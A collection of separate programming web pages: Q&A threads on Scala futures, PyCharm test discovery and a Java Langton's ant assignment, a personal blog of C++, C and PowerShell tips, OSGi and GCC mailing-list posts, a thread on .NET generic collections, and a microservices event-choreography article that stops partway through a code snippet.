I'm currently writing code to extend the `Future` companion object. One function I want to implement is `any`:

```scala
// Returns the future that computes the first value computed from the list.
// If the first one fails, fail.
def any[T](fs: List[Future[T]]): Future[T] = {
  val p = Promise[T]()
  fs foreach { f =>
    f onComplete {
      case Success(v) => p trySuccess v
      case Failure(e) => p tryFailure e
    }
  }
  p.future
}
```

And here is the test:

```scala
test("A list of Futures return only the first computed value") {
  val nums = (0 until 10).toList
  val futures = nums map { n => Future { Thread.sleep(n * 1000); n } }
  val v = Await.result(Future.any(futures), Duration.Inf)
  assert(v === 0)
}
```

Answer: `Thread.sleep` is a blocking operation in your `Future`, but you are not signaling to the `ExecutionContext` that you are doing so, so the behavior will vary depending on which `ExecutionContext` you use and how many processors your machine has. Your code works as expected with `ExecutionContext.global` if you add `blocking`:

```scala
nums map { n => Future { blocking { Thread.sleep(n * 1000); n } } }
```
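For comparison, the same "first future wins" combinator can be sketched in Python with asyncio; the helper names `first_of` and `delayed` are invented for this sketch:

```python
import asyncio

async def first_of(coros):
    """Resolve with whichever coroutine finishes first, success or failure,
    mirroring the Promise/trySuccess pattern above."""
    tasks = [asyncio.ensure_future(c) for c in coros]
    done, pending = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
    for t in pending:
        t.cancel()                        # the losers are cancelled
    return next(iter(done)).result()      # re-raises if the winner failed

async def delayed(seconds, value):
    await asyncio.sleep(seconds)
    return value

if __name__ == "__main__":
    # The 0.1-second task wins over the 0.3-second one.
    print(asyncio.run(first_of([delayed(0.3, 3), delayed(0.1, 1)])))
```

Note that `asyncio.sleep` is non-blocking, so there is no equivalent of the `blocking` hint needed here; a truly blocking call would go through `loop.run_in_executor` instead.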
https://codedump.io/share/Sum9Us5NuJoR/1/weird-behavior-of-scala-future-and-threadsleep
enum size in C++

Here's a nice trick I figured out today. A lot of times I'll set up an enum in C++ and then I want to index an array with the symbols defined in the enum. So, let's say I want to use an array with one entry for each of the symbols in the enum, and I can allocate the array at compile time because I can look at my enum and count how many values there are. But maybe later I'll need to add a few values to that enum and then I'll forget to count how many there are! I'll get compilation errors! Here's what I can do instead of counting. Here's my enum:

```cpp
enum BigCats { TIGER, LIGER, LION, COUGAR, NUM_CATS };
```

Notice the NUM_CATS as the last element! Because the enumerators count up from zero, NUM_CATS is always equal to the number of real values before it. Maybe I want to have an array of ints that represents how awesome I think each cat is. Now I can do this:

```cpp
int AwesomeCats[NUM_CATS];
```

powershell script to print function

here's a powershell script i worked up the other night. i do embedded programming at work with an ide that doesn't always search through a set of files correctly. so, i usually do it manually, and spend a lot of time in powershell searching through the code to find things. things like functions and junk. so, now instead of something like `grep functionName *.c`, looking at the file name and line number and then going into the ide to open the file and see it, i'm just like: `show-function functionName`. WOW!

```powershell
# PS script to print out a function given the name
# Nick Gamroth
# May 2008
if ($args[0] -eq $NULL) {
    echo "ERROR: no function name given"
    return
}

# here's a junky regex to search for function definitions
$search = "[\w\s]" + $args[0] + "\("

# figure out what file the function is defined in
# hopefully, this will only be 1
$match = get-childitem . -Include *.c -Recurse | select-string -list -pattern $search
$file = $match.Filename
$line = $match.LineNumber

# show the file starting at that line
$count = (get-content $file | measure-object).Count
$d = ($count - $line + 1)

# get all the lines starting at the one we found the method start at
$meth = get-content $file | select-object -last $d
$braces = 0
$i = 0
$meth | foreach-object {
    $l = $_
    echo $l
    if ($l.Contains("{")) { $braces++ }
    if ($l.Contains("}")) { $braces-- }
    if ($braces -eq 0) {
        # make sure we get past the first line
        if ($i -gt 1) { break }
    }
    $i++
}
```

Science Time!

I just remembered that I used to have some math/science related notes on this site before the redesign. These notes used to get a few Google searches, so I re-added them. I've even added some new stuff about discrete-time Fourier transforms! Science: It Works, Bitches!

Coverflow ripoff

Remember coverflow? Remember how it was so much better as a standalone app than it is as a part of iTunes? Yeah, me too, and I totally miss it. I had a few spare minutes today, so I put together an interface prototype of a clone.

MAT Files From C

Here's a tip: you can easily generate binary .mat files right from C/C++! I've been trying to do this for a really long time, but it turns out I wasn't reading the MATLAB documentation, which tells you just how to do it!

```c
#include <string.h>
#include "mat.h"  /* matlabroot\extern\include */

void main() {
    double array[] = {1, 2, 3, 4, 5, 6, 7, 8, 9};
    mxArray *a = mxCreateDoubleMatrix(9, 1, mxREAL);
    memcpy(mxGetPr(a), array, 9 * sizeof(double));
    MATFile *matfile = matOpen("matfile.mat", "w");
    matPutVariable(matfile, "data", a);
    matClose(matfile);  /* flush and close, or the file may be incomplete */
}
```

You also need to link with libmat.lib, which is somewhere like matlabroot\extern\lib\win32\microsoft\msvc60.

AwesomeForm

Wow, I wrote another CodeProject article!! This one is about a Form class I made that is translucent. It's not bad, but it could be better.
I'll work on it some more.

undefined reference when linking library

wow, i thought that i was totally screwed for a minute over here. i'm writing this program that uses a bunch of external libraries, and one of them is the bluesoleil bluetooth SDK from IVT. it comes with a .lib that i was having a rough time linking with when using Qt Creator. every time i'd try and build the project, i'd get undefined reference errors for every function defined in that library. here's how i figured out what was going on:

- used dumpbin /ALL to take a look at everything the lib was exporting
- verified that the functions i was calling existed
- noticed that function names in the lib were prepended with a '_'
- !!!
- noticed that the errors i was getting didn't have underscores
- figured out that this library was using C, but my code was all C++
- used extern "C" { ... } around my header files

this probably should have been obvious right away, but it's a hard problem to search for, and it gave me a rush when i figured it out.

Average of a file of numbers in powershell

I kind of like the idea of using powershell as a sort of MATLAB substitute for quick analysis of data. I had the opportunity to do that today since I ran some tests that resulted in a few files that were just lists of numbers. I was interested in the mean of all the numbers in each file, so I wrote this script:

```powershell
# mean.ps1
# calculates the mean of a set of numbers stored in a text file. each number
# should be on its own line.
# Nick Gamroth
$data = get-content $args
write-host "Calculating mean of" $data.length "data points found in" $args
$sum = 0
for ($i = 0; $i -lt $data.length; $i++) {
    $sum += [double]$data[$i]
}
$mean = $sum / $data.length
$mean
```

jabba the chatfest

I've done some work on the interface prototype for my jabber client. It's going pretty well, but there are a lot of performance bugs to work out. Here's a screenshot:

Of course, those goofy looking images are just test images. In use, they'd be pictures of other users. The exciting part about the interface is that when you switch users, the chat window "flips" over to reveal the conversation you're having with another user on the back. I wrote a CodeProject article about that control. I made an entry here about it, but I must have managed to delete it from the database.

It's New!

I redesigned this site! I got some new shoes that are grey and orange, and I like the color combination, so I used it for this site. It's a little bit halloween-ish, but it's not bad. Also, I learned how to use PHP and MySQL to create a database back-end. I'll probably post the source for it soon. It's really simple, so it'd probably be a good starting point for others who want to do something similar.
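As an aside, the C++ NUM_CATS sentinel trick from the enum post above isn't needed in languages whose enums know their own size. A Python sketch of the same idea:

```python
from enum import IntEnum

class BigCats(IntEnum):
    TIGER = 0
    LIGER = 1
    LION = 2
    COUGAR = 3

# No NUM_CATS sentinel required: the enum reports its own member count,
# so the "awesomeness" table always stays in sync when cats are added.
awesome_cats = [0] * len(BigCats)
awesome_cats[BigCats.LIGER] = 11

print(len(BigCats))  # 4
```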
http://thebeekeeper.net/
I just downloaded PyCharm v1.5.4 and went to this JetBrains video - it has you start by creating a project and writing a test... pretty straightforward. However, even though my code mimics what's on the screen, I keep getting "no tests were found". Here's the code:

```python
from unittest import TestCase

class Conference(object):
    def get_talk_at(self, time):
        pass

class ConferenceTest(TestCase):
    def test_empty(self):
        c = Conference()
        self.assertEqual(None, c.get_talk_at(10))
```

In the video he runs this with CTRL-SHIFT-F10 (doesn't work on mine, but I'd imagine that's just because of which keymap I chose), but if I right-click the folder and select "Run Unittests in '...'" it runs, just nothing is found.

On a side note, is there an explicit declaration I can make on a test that says "hey, this is a test", kinda like NUnit's [TestFixture] or [Test]? How does PyCharm/Python determine which methods are tests?

Okay, I changed my keymap in the settings to "Default", came back, used CTRL-SHIFT-F10 to run the tests, and something happened (the test failed, but that's a different issue). However, going to the project, right-clicking the folder, and selecting the "Run Unittests in ..." option still shows "no tests were found". What's going on? I don't like that it's auto-magically happening with the keyboard press but not happening through the context menu... Any help would be appreciated.

UPDATE: If I right-click the .py file in the folder, it runs the tests, just like CTRL-SHIFT-F10 does. Not sure why the option at the folder level doesn't work.

Hi MikeM, this happens because of the name of the test file. Python unittests use a "test.*" pattern to collect tests from the directory. If you want to collect tests regardless of the file name, just check the pattern checkbox in the run configuration and enter ".*" as the pattern.

Thanks for that. Putting in the pattern worked, regardless of file name. I'm assuming at that point it's just looking for any class that inherits unittest.case.TestCase?

Yes, it works the same way as unittest and attaches a nice tree view of results.
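On the question of how Python decides what counts as a test: within a file, unittest collects subclasses of `TestCase` and, inside them, methods whose names start with `test`. A small self-contained sketch using the loader API directly:

```python
import unittest

class Conference(object):
    def get_talk_at(self, time):
        return None  # stub, as in the tutorial

class ConferenceTest(unittest.TestCase):
    def test_empty(self):          # picked up: name starts with "test"
        self.assertIsNone(Conference().get_talk_at(10))

    def check_empty(self):         # NOT picked up: wrong prefix
        pass

loader = unittest.TestLoader()
suite = loader.loadTestsFromTestCase(ConferenceTest)
print(suite.countTestCases())  # 1 -- only test_empty was collected
```

File-level discovery additionally applies a file-name pattern (`test*.py` by default), which is why renaming the file or changing the run-configuration pattern fixes the folder-level run.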
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206590965-New-to-pyCharm-Getting-started-not-working
Hi, I am a beginner in Java and have an assignment to simulate a Langton's Ant. I would like some help on where to start.

```java
package simulation;

/**
 * Simulation class
 */
public class Simulation {

    public int height;
    public int width;
    public int antStartI;
    public int antStartJ;
    public Direction originalDirection;
    public int maxTimeSteps;

    /**
     * @param height - the height of the grid
     * @param width - the width of the grid
     * @param antStartI - the original I coordinate of the ant
     * @param antStartJ - the original J coordinate of the ant
     * @param originalDirection - the original direction the ant is facing
     */
    public Simulation(int height, int width, int antStartI, int antStartJ,
                      Direction originalDirection, int maxTimeSteps) {
        this.height = height;
        this.width = width;
        this.antStartI = antStartI;
        this.antStartJ = antStartJ;
        this.originalDirection = originalDirection;
        this.maxTimeSteps = maxTimeSteps;
    }

    /**
     * Execute a time step for the simulation.
     *
     * The ant must:
     * * move forward 1 space
     *   - if this movement would cause it to move off the grid,
     *     the simulation is completed.
     * * rotate depending on the state of the cell the ant is occupying
     *   - if the cell is white, rotate left
     *   - otherwise, rotate right
     * * change the state of the cell the ant is currently occupying
     *   - if the cell is white, it becomes black
     *   - otherwise, it becomes white
     *
     * NOTE: this method should do nothing if the simulation is completed.
     */
    public void executeStep() {
        switch (direction) {
            case NORTH:
                break;
            case SOUTH:
                break;
            case EAST:
                break;
            case WEST:
                break;
        }
    }

    /**
     * Method to check if the simulation is completed.
     *
     * The simulation is completed if and only if:
     * * it has reached the maximum time steps allowed
     * * the ant has moved off the grid
     *
     * @return true - the simulation is completed
     * @return false - the simulation is not completed
     */
    public boolean isCompleted() {
        // TODO fill in this method
    }

    /**
     * Method to return a copy of the current grid.
     *
     * You should always return a copy of an object if you do not
     * want your base object to be changed by any code calling this method.
     *
     * @return a clone of the grid.
     */
    public Grid cloneCurrentGrid() {
        // TODO fill in this method
    }

    /**
     * Method to return a copy of the current ant.
     *
     * You should always return a copy of an object if you do not
     * want your base object to be changed by any code calling this method.
     *
     * NOTE: Do not cache this value; return a new object for every call.
     *
     * @return a clone of the ant.
     */
    public Ant cloneCurrentAnt() {
        // TODO fill in this method
    }
}
```

I tried to write executeStep but have no idea how to set the ant's next position based on its direction. Any ideas?
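To get you started on executeStep, here is the movement logic sketched in Python: one table maps each direction to a coordinate delta, and two tables map a direction to the result of turning left or right. I'm assuming I grows downward, J grows rightward, and 0 means white; adapt as needed to your Grid and Ant classes.

```python
DELTAS = {"NORTH": (-1, 0), "SOUTH": (1, 0), "EAST": (0, 1), "WEST": (0, -1)}
LEFT   = {"NORTH": "WEST", "WEST": "SOUTH", "SOUTH": "EAST", "EAST": "NORTH"}
RIGHT  = {new: old for old, new in LEFT.items()}  # turning right undoes a left turn

def execute_step(grid, ant):
    """One step: move forward, turn by cell colour, then flip the cell.
    Returns False when the ant walks off the grid (simulation completed)."""
    di, dj = DELTAS[ant["direction"]]
    ant["i"] += di
    ant["j"] += dj
    if not (0 <= ant["i"] < len(grid) and 0 <= ant["j"] < len(grid[0])):
        return False
    white = grid[ant["i"]][ant["j"]] == 0
    ant["direction"] = LEFT[ant["direction"]] if white else RIGHT[ant["direction"]]
    grid[ant["i"]][ant["j"]] = 1 if white else 0
    return True
```

In Java the same tables can live in the Direction enum (e.g. deltaI()/deltaJ(), left() and right() methods), which shrinks executeStep to a few lines instead of one case per direction.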
http://www.javaprogrammingforums.com/object-oriented-programming/28031-lagnton-ant.html
Hi all,

I am also investigating OSGi and Virgo. As Ronald pointed out, it would be great to be able to have a modular system and hot-swap software modules using a management console. I am working on a project which is built with Gradle and uses Spring + JPA + Hibernate (4.1.5) libraries. I am also using some other "standard" 3rd party libraries, e.g.:

- slf4j + log4j for logging,
- Jackson for JSON mapping, and
- Dozer for Java bean to bean mapping.

In my project I have some modules which are deployed as web applications (war files). Currently, I am using Tomcat 7 to run them, using the deploy/undeploy mechanism as a replacement for lifecycle management. These web applications (my "modules") talk to each other via HTTP (RESTful APIs). I have some basic questions on the topic of migrating this project to OSGi and Virgo:

1) Assuming all my modules are OSGi-fied: will there be any advantages if I switch from RESTful communication between my modules to OSGi-service-based communication?

2) I want to use Spring; is it still possible to choose between the Spring way of exporting OSGi services (e.g. via spring-osgi-context.xml with the "beans" namespace) and the Blueprint specification style (blueprint.xml with the "blueprint" namespace)? Will the latter also work with Apache Aries?

3) Do I have to bundle (e.g. using bundlor) every 3rd party dependency manually if I cannot find the version I need/want in the SpringSource Enterprise Bundle Repository?

4) Is it true that it is not straightforward to OSGi-fy the Hibernate libraries?

5) Do you have any experience with the Gradle OSGi plugin? Do I have to duplicate my dependency management effort, i.e. manage dependencies for the build using Gradle (build.gradle) and explicitly manage dependencies for OSGi (MANIFEST.MF), or is the manifest properly generated by the plugin?

6) From your experience, would it be easier in the "OSGi world" to just use Maven instead of Gradle, and EclipseLink/OpenJPA instead of Hibernate (I read about some class-loading issues with Hibernate)?

Any comments/suggestions/hints are highly appreciated.

Regards,
Sönke
http://www.eclipse.org/forums/index.php/mv/msg/365218/890161/
This is the mail archive of the gcc@gcc.gnu.org mailing list for the GCC project.

--On Thursday, July 26, 2001 02:52:26 AM +0200 Marc Espie <espie@quatramaran.ens.fr> wrote:

> In article <76410000.995505677@warlock.codesourcery.com> you write:
>> We are nearing the pre-3.0.1 freeze.
>>
>> In particular, after midnight GMT - 0800 on July 21st, non-documentation
>> check-ins on the branch will require my approval. I will make a release
>> candidate at that time, for the planned August 1st release.
>
> I'm still waiting for approval on the following patch...
>
> which you should have in your mailbox already.

Shoot -- I didn't remember to go back and deal with this message until now. The patch is OK. Since the late approval is my fault, we'll chance incorporating the patch. Go ahead and check it in on the mainline.

On the branch, please do not do the configure.in change, and adjust the mathconf.h change to just do:

    #ifdef __OpenBSD__
    #include <sys/types.h>
    #endif

in the appropriate place. Ugly, but very safe, and safety first at this stage. Please test that to confirm it works. Please apply this patch ASAP and let me know when you have applied it. Then, I will respin.

Thank you,

--
Mark Mitchell    mark@codesourcery.com
CodeSourcery, LLC
http://gcc.gnu.org/ml/gcc/2001-08/msg00740.html
- Sometimes the type in the collection isn't sufficiently distinctive, especially if it's a built-in type. You'd like to see something like EmployeeIDCollection rather than List<int>.
- It's often useful to add additional functionality to the collection beyond what you get from the built-in collection class.

Should I understand this post as if you don't agree with <a href="">this blog post by Martin Fowler</a>?

Best Regards, Jimmy

> well, actually, we couldn't replace them, as that would break existing code

And this is where I just turn around and cry. So, you leave all the buggy (yes, they DO have bugs) 1.0/1.1 lists in your code? This is pathetic. I want a clean, workable .NET 2.0. Don't start polluting the framework yet. You have a chance here. BREAK THE CODE, give me a better and less buggy framework.

Eric, you're making a good point here. However, I think its realization calls for having a typedef-kind of statement. I understand the reasons why typedef/define constructs are dislikable, but what about just having a shortened version of class declaration syntax where "{}" will not be required, i.e.:

    class EmployeeIDCollection : List<int>;

instead of

    class EmployeeIDCollection : List<int> {}

I just foresee myself creating a lot of those "custom" classes that won't really add any new functionality to the base classes.

Jimmy, in his blog entry, Martin says in relation to custom-typed collections: "On the whole, however, it isn't worth the trouble." If you have to write them by hand, or use some generator program, I agree with him. But if you don't, then it's fairly low effort to have a strongly-typed collection, and I think it has real advantages over a simple List<Employee>. This is specifically for the library design case. I'm not sure yet how I feel about what you should do with collections inside a component, as I haven't thought about it a lot. My initial guess is that I will tend to use something like List<Employee> because it's simpler.

Martin also makes an interesting point about encapsulated collections, though I'm not sure how to reconcile his advice to use one vs. his earlier comment about just using a parameterized collection. Anyway, I think there are times when you'd want to have encapsulation, but there are also times where you want your classes to be more promiscuous, so to speak.

Thomas, I sympathize with your comments. We all agree that the frameworks would be much nicer if we had had generics in the first version, and we wouldn't have the ugliness of having multiple versions of collection classes. But I don't think we can make changes that are likely to break existing code, and if we tried to back-patch generic lists into places where the user used a non-generic list, I think we would break a fair bit of code. I don't think it's unreasonable for users to want to recompile and not have this happen. If you want to get rid of the non-generic classes, you should be able to change your using statement and then fix things up by hand. It's possible you'll need to revisit some code, especially if you store value types in collections, as you don't have a null value option in a generic collection that holds a value type.

I'm late to this thread, but I'm bored so I'm perusing the archives. Would a possible solution to the break/don't break question be to keep the existing System.Collections types defined as they are but move them out of mscorlib? Then if you want the old ones you can add a reference and be on your way, the new version stays consistent, and we don't need a (crufty) System.Collections.Generic namespace. I'm sure there's a problem with this idea (maybe related to the GAC and versioning policy?). Will System.Collections.ArrayList at least be marked as [Obsolete] in version 2? And a related question: what is the CLS policy with respect to generics?
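For what it's worth, the "thin named collection" idea is cheap in any language with subclassable collections. A Python sketch, with the class and method names invented for illustration:

```python
from typing import List

class EmployeeIDCollection(List[int]):
    """Reads better in signatures than a bare list of ints, and gives the
    type a home for domain behaviour added later."""
    def positive(self) -> "EmployeeIDCollection":
        # Hypothetical domain helper: keep only valid (positive) IDs.
        return EmployeeIDCollection(e for e in self if e > 0)

ids = EmployeeIDCollection([3, -1, 7])
print(ids.positive())         # [3, 7]
print(isinstance(ids, list))  # True -- still usable anywhere a list is expected
```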
https://blogs.msdn.microsoft.com/ericgu/2003/09/04/generics-and-object-collections/
Know the Flow! Microservices and Event Choreographies

Key Takeaways

- In a microservices architecture it is not uncommon to encounter services which are long running and stretch across the boundary of individual microservices.
- Event-based architectures with corresponding choreographies are one increasingly common way this can be handled, and typically decrease coupling.
- Central to the idea is that all microservices publish events when something of business relevance happens inside of them, which other services can subscribe to. This might be done using asynchronous messaging or perhaps as a REST service.
- The article authors explore a pattern they call "event command transformation" as a way of reasoning about these cross-cutting concerns while avoiding central controllers.
- For implementing the flow you can leverage existing lightweight state machines and workflow engines. These engines can be embedded into your microservice, avoiding any central tool or central governance.

Let's assume we want to design a microservices architecture to implement some reasonably complex "end-to-end" use case, e.g. the order fulfillment of a web-based retailer. Obviously, this will involve multiple microservices. Consequently, we have to deal with managing a business process that stretches across the boundary of individual services. But when reaching out for nicely decoupled microservices, some challenges arise related to such cross-service flows. In this article, we will therefore introduce helpful patterns such as the "event command transformation" and present technology approaches to tackle the complexity of coding flows stretching across microservices, without introducing any central controller.

First, we have to come up with an initial microservice landscape and define the boundaries of microservices and their scope. Our goal is to minimize coupling between various services and keep them independently deployable.
By doing so we want to maximize the autonomy of the teams; for every microservice there should be one cross-functional team taking care of it. As this is particularly important for us, we decided to follow a more coarse-grained approach and design just a few self-contained services built around business capabilities. This results in the following microservices:

- Payment Service – the team is responsible for dealing with everything related to "money"
- Inventory Service – the team is responsible for taking care of stock items
- Shipment Service – the team is responsible for "moving stuff to customers"

The web shop itself will probably be comprised of several more microservices, e.g. Search, Catalogue etc. As we focus on the order fulfillment, we are only interested in one web shop related service that allows the customer to place an order:

- Checkout Service – the team deals with checking out the customer's shopping cart

This service will ultimately trigger the order fulfillment to start.

Long Running Flows

We have to consider one important characteristic of the overall order fulfillment: it is a long running flow of actions to be carried out. By the term "long running" we mean that it can take minutes, hours or even weeks until the order processing is complete. Consider the following example: whenever a credit card is rejected during payment, the customer has one week to provide new payment details. That means the order might have to wait for one week. The implications of such long running behavior pose requirements on the implementation approach which we will discuss in greater detail in this article.

Event Collaboration

We do not discuss the pros and cons of communication patterns in this article, but rather decided to illustrate our topic by means of an event-centric communication pattern between services.
Central to the idea of event collaboration is that all microservices publish events when something business-relevant happens inside of them. Other services may subscribe to that event and do something with it, e.g. store the associated information in a form optimal for their own purposes. At some later point in time, a subscribing microservice can use that information to carry out its own service without being dependent on calling other services. Therefore, with event collaboration a high degree of temporal decoupling between services becomes the default. Furthermore, it becomes easy and natural to achieve the kind of decentralized data management we look for in a microservices architecture. The concept is well understood in Domain-Driven Design, a discipline currently accelerating in the slipstream of microservices and the "new normal" of interacting, distributed systems in general. Note that event collaboration could be implemented with asynchronous messaging, but also by other means: microservices could, for example, publish REST-based feeds of their events which other services consume on a regular basis.

Event Command Transformation

Our order fulfillment starts with the event Order Placed. The first thing that must happen in our minimum viable order fulfillment is the customer's payment. The payment service successfully finishes with the event Payment Received, after which we take care of consignment of the goods in the stock (Goods Fetched) and the shipping to the customer (Goods Shipped). So we have a clear flow of events – at least in the "happy" scenario. One could now easily create a chain of events as depicted in Figure 1.

Figure 1: Each of the microservices is listening to the previous one in the chain

As much as we support the fundamental idea of event collaboration, these types of event chains provide a suboptimal approach for implementing the end-to-end logic of whole business processes.
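The event chain of Figure 1 is easy to sketch with a toy in-memory bus, which also makes the coupling problem tangible: each subscription hard-wires one service to its predecessor's event. All names here are illustrative, and the bus stands in for a real message broker:

```python
from collections import defaultdict

class EventBus:
    """Minimal in-memory pub/sub bus, standing in for a real broker."""
    def __init__(self):
        self._subscribers = defaultdict(list)

    def subscribe(self, event_type, handler):
        self._subscribers[event_type].append(handler)

    def publish(self, event_type, payload=None):
        for handler in list(self._subscribers[event_type]):
            handler(payload)

bus = EventBus()
handled = []

# The chain from Figure 1: every service listens to the previous one.
def payment(order):
    handled.append("payment")
    bus.publish("PaymentReceived", order)

def inventory(order):
    handled.append("inventory")
    bus.publish("GoodsFetched", order)

def shipment(order):
    handled.append("shipment")
    bus.publish("GoodsShipped", order)

bus.subscribe("OrderPlaced", payment)
bus.subscribe("PaymentReceived", inventory)
bus.subscribe("GoodsFetched", shipment)

bus.publish("OrderPlaced", {"order": 42})
print(handled)  # ['payment', 'inventory', 'shipment']
```

Note that reordering the steps means touching three subscriptions at once, which is exactly the coupling problem discussed next.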
We see it happen for the noble goal of reducing coupling, but these solutions might even increase coupling. Let's dive into that.

An event is by definition meant to inform you about a relevant fact that occurred and that some other service might be interested in. But the moment we require a service to follow up on an event, we use that event as if it had the semantic meaning of a command. The consequence of this: we end up with tighter coupling than necessary. In our example, the payment service listens to the event Order Placed in the checkout service. Now the payment service has to know at least something about checkouts. But it's better if it doesn't, for the following reasons:

- Consider that our organization probably needs payment services for various reasons and not just when retail orders are placed. The payment service would have to be adjusted and redeployed whenever we want to bind the payment service to a new event, even though the specifics of how exactly payments are carried out do not change at all.
- Consider simple business requirements like changing the order of some steps. If the business wishes to make sure that goods are correctly fetched before the customer is charged, three services would have to be adjusted at the same time: Payment now listens to Goods Fetched, while Inventory listens to Order Placed and Shipment now subscribes to Payment Received.
- Consider we issue invoices for special orders, e.g. for VIP customers. Now, not only does the payment service have to understand the rule, as it needs to decide if the payment has to be done whenever an order is placed, but also the inventory service has to understand that just listening to Payment Received events will bring the overall process for VIPs to a halt!

Therefore, we recommend what we call the event command transformation pattern.
Make sure that the component responsible for making a business decision ("payment is needed now") transforms an event (Order Placed) into a command (Retrieve Payment). The command can be sent to the receiving service (payment) without that service knowing about the client, and without the disadvantages listed above. Note that "issuing commands" for long running flows does not necessarily mean making use of request/reply oriented protocols. It can also be implemented by other means: microservices could listen to asynchronous command messages in a similar way they already listen to events. Furthermore, note that event command transformation also takes place when the event subscriber transforms an event into an internal command. We recommend the transformation be made by the party responsible for making the decision that "something needs to happen." But who is that party in our example? Should the checkout service issue the Retrieve Payment command? No. Reconsider the change scenarios given above. All of them suggest that we need a separate microservice handling some of the end-to-end logic of the order fulfillment:

- Order Service – the team is responsible for dealing with the end-to-end logic of the customer facing core capability of the business: fulfilling orders.

This service does the event command transformation. It transforms Order Placed into Retrieve Payment. It might decide autonomously to do that for non-VIP customers only. It might also consult another microservice first which encapsulates the rules for what constitutes a VIP customer. Such an end-to-end service improves decoupling massively when compared to puristic event collaboration as described. But how can we avoid that the mere fact of introducing an end-to-end service will result in a "God-like" service holding most of the crucial business logic and delegating to "anemic" (CRUD) services?
As this would eliminate a lot of benefits of event choreographies, God services are not recommended by many authors, e.g. Sam Newman in Building Microservices. Furthermore, isn't a commanding service using the orchestration principle, which is perceived as the enemy of loose coupling?

Choreography vs. Orchestration – Decentralized Governance for Business Processes

Avoiding God services and central controllers is a question of taking the responsibilities and autonomy of the teams seriously. Having end-to-end responsibility for an order in a highly decentralized organization does not mean that you constantly interfere with the responsibilities of other teams like payment; on the contrary! Having the end-to-end responsibility for orders means that "payment" is a black box for you. You are only in charge of asking it to perform its work (Retrieve Payment) and waiting for its completion: Payment Received. Consider the previously mentioned business requirement that whenever a credit card is rejected, the customer has one week to provide new payment details. We could be tempted to implement such logic in the order service, but only if the commands offered by the payment service are very fine-grained. If the payment team takes its own business capabilities and associated responsibilities seriously, it will determine that it is responsible for collecting payments even if this potentially takes longer than just attempting to charge a credit card. The payment team can guard against any God-like service tendencies by providing a few coarse-grained, potentially long running capabilities instead of a myriad of fine-grained or even CRUD-like functions. This idea is depicted in Figure 2.
Figure 2: End-to-end flow logic is decentrally governed; the responsibilities are distributed

In a highly decentralized organization, the end-to-end order service will be as lean as possible, because most aspects of its end-to-end process will be managed autonomously by other services specializing in their own business capability. The payment service serves as an example of that principle: it's the responsibility of the payment team to implement everything necessary to collect the payment. This is a crucial aspect to consider and a common misconception when talking about the implementation of business processes: it does not necessarily mean that you design the overall process in one piece and let a central orchestrator carry it out, as was advertised in the old SOA and BPM days. The ownership of the process and the needed flow logic can be distributed. How much will primarily depend on your organizational structure, which should also be reflected in your service landscape (see Conway's Law). Following this approach, you do not end up with a central, monolithic controller. If you now think that splitting up the end-to-end flow logic increases the complexity of your system, you might be right. Similar trade-offs apply to introducing a microservices architecture in the first place: monolithic approaches are often easier but will reach their limits when the system grows and can no longer be handled by one single team. It's just about the same with flow logic.

To sum up what we discussed so far: choreography is a fundamental pattern for a microservices architecture. We recommend following that pattern as an important rule of thumb. But when it comes to business processes, don't create puristic event chains; implement decentralized flow logic and use the event command transformation pattern instead. The microservice responsible for deciding an action should also be responsible for transforming an event into a command.
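The responsibility split can be sketched as a tiny event handler inside the order service. The event and command names follow the article, while `publish_command` and `is_vip` are placeholders for real infrastructure:

```python
def order_service(event, publish_command, is_vip):
    """Event command transformation: the order service owns the decision
    and turns incoming events into commands for the specialist services."""
    kind, order = event["type"], event["order"]
    if kind == "OrderPlaced":
        if is_vip(order):
            publish_command({"type": "IssueInvoice", "order": order})
        else:
            publish_command({"type": "RetrievePayment", "order": order})
    elif kind == "PaymentReceived":
        publish_command({"type": "FetchGoods", "order": order})
    elif kind == "GoodsFetched":
        publish_command({"type": "ShipGoods", "order": order})

commands = []
order_service({"type": "OrderPlaced", "order": 42},
              commands.append, is_vip=lambda order: False)
print(commands[0]["type"])  # RetrievePayment
```

The payment service now only understands the Retrieve Payment command; binding payments to a new kind of event, or special-casing VIP orders, is a change inside the order service alone.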
Flow Logic Implementation

Let's look at the implementation of long running flow logic. Long running flows require their state to be saved, as you might have to wait an arbitrarily long time. State handling is not a new thing to do; that's what databases are for. So an easy approach is to store the order state as part of some entity, e.g. as shown in Code Snippet 1.

public class OrderStatus {
    boolean paymentReceived = false;
    boolean goodsFetched = false;
    boolean goodsShipped = false;
}

Code Snippet 1: A simplified order status to be used as part of some entity

Or you might use your favorite actor framework. We discuss basic options here. All of this works to some extent, but typically you face additional requirements as soon as you start implementing the states needed for long running behavior: how can you implement waiting for seven days? How can you handle errors and retries? How can you evaluate cycle time for orders? Under which circumstances do orders get canceled because of missing payments? How can I change the flow if I always have some orders somewhere in the processing line? This can lead to a lot of coding which ends up in a home-grown framework, and teams working on affected projects complain, as an enormous amount of effort is buried in it. So we want to have a look at a different approach: leveraging existing frameworks. In this article, we use the open source engine from Camunda to illustrate concrete code examples. Let's have a look at Code Snippet 2.

engine.getRepositoryService().createDeployment()
    .addModelInstance(Bpmn.createExecutableProcess("order")
        .startEvent()
        .serviceTask().name("Retrieve payment").camundaClass(RetrievePaymentAdapter.class)
        .serviceTask().name("Fetch goods").camundaClass(FetchGoodsAdapter.class)
        .serviceTask().name("Ship goods").camundaClass(ShipGoodsAdapter.class)
        .endEvent().camundaExecutionListenerClass("end", GoodsShippedAdapter.class)
        .done()
    ).deploy();

Code Snippet 2: The order flow can be expressed in code, e.g.
by using Java

The engine now runs instances of this flow, keeps track of their state and stores it in a persistent way, surviving disasters or long periods of waiting. The missing adapter logic can easily be coded too, as shown in Code Snippet 3:

public class RetrievePaymentAdapter implements JavaDelegate {
    public void execute(ExecutionContext ctx) throws Exception {
        // Prepare payload for the outgoing command
        publishCommand("RetrievePayment", payload);
        addEventSubscription("PaymentReceived", ctx);
    }
}

Code Snippet 3: Additional logic needed can be coded with adapters, e.g. by using Java

Such an engine can also handle more complex requirements. The following flow catches all errors when charging the credit card. The flow then moves forward on an alternative path and asks the customer to update their details. As we don't know if and when the customer will do that, we then have to wait for an incoming message from them (or, technically speaking, most probably from some UI or other microservice). But we wait only for seven days; after that we automatically end the flow and issue a Payment Failed event. Compare Code Snippet 4.
Bpmn.createExecutableProcess("payment")
    .startEvent()
    .serviceTask().id("charge").name("Charge credit card").camundaClass(ChargeCreditCardAdapter.class)
    .boundaryEvent().error()
    .serviceTask().name("Ask customer to update credit card").camundaClass(AskCustomerAdapter.class)
